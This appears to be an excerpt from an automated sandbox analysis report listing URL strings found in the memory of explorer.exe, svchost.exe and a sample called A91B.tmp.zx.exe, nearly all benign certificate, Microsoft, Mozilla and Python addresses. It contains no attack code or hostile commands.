Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: explorer.exe, 00000002.00000000.1738931822.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2969120001.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1740843885.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2973724478.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000002.00000000.1738931822.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2969120001.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1740843885.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2973724478.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: explorer.exe, 00000002.00000000.1738931822.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2969120001.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1740843885.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2973724478.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: explorer.exe, 00000002.00000002.2969120001.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: python38.dll.8.dr	String found in binary or memory: http://python.org/dev/peps/pep-0263/
Source: explorer.exe, 00000002.00000002.2972507540.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.2976082883.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.2971758308.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: explorer.exe, 00000002.00000002.2979823330.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1744073226.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2044663166.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: A91B.tmp.zx.exe, 00000008.00000003.1909381834.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1929353561.000002492B22B000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000002.1932868155.000002492B22B000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1927472131.000002492B218000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1927616388.000002492B222000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1927959831.000002492B224000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.python.org/dev/peps/pep-0205/
Source: A91B.tmp.zx.exe, 0000000B.00000003.1926472085.000002492D281000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1926427005.000002492B224000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000002.1933283917.000002492D1C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
Source: explorer.exe, 00000002.00000002.2979823330.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2044663166.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000000.1738931822.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2969120001.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000002.00000000.1738931822.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2969120001.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000002.00000000.1744073226.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2979823330.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000002.2973724478.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1740843885.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000002.2973724478.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1740843885.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000002.00000000.1737733068.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738236161.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2964470757.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2966311683.0000000003700000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.1740843885.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2973724478.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2973724478.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1740843885.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000000.1740843885.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2973724478.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: svchost.exe, 00000001.00000003.1710887914.000001F42FC23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: svchost.exe, 00000001.00000003.1710887914.000001F42FC23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000002.00000002.2969120001.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000002.00000002.2969120001.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: svchost.exe, 00000001.00000003.1710887914.000001F42FC23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: svchost.exe, 00000001.00000003.1710887914.000001F42FC23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: explorer.exe, 00000002.00000003.2044663166.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1744073226.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2979823330.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: A91B.tmp.zx.exe, 0000000B.00000002.1932658206.000002492B207000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1928152495.000002492B1D4000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1930611252.000002492B205000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1927536905.000002492B170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: A91B.tmp.zx.exe, 0000000B.00000002.1933067117.000002492CE80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: A91B.tmp.zx.exe, 0000000B.00000003.1927536905.000002492B170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: A91B.tmp.zx.exe, 0000000B.00000002.1932658206.000002492B207000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1928152495.000002492B1D4000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1930611252.000002492B205000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1927536905.000002492B170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
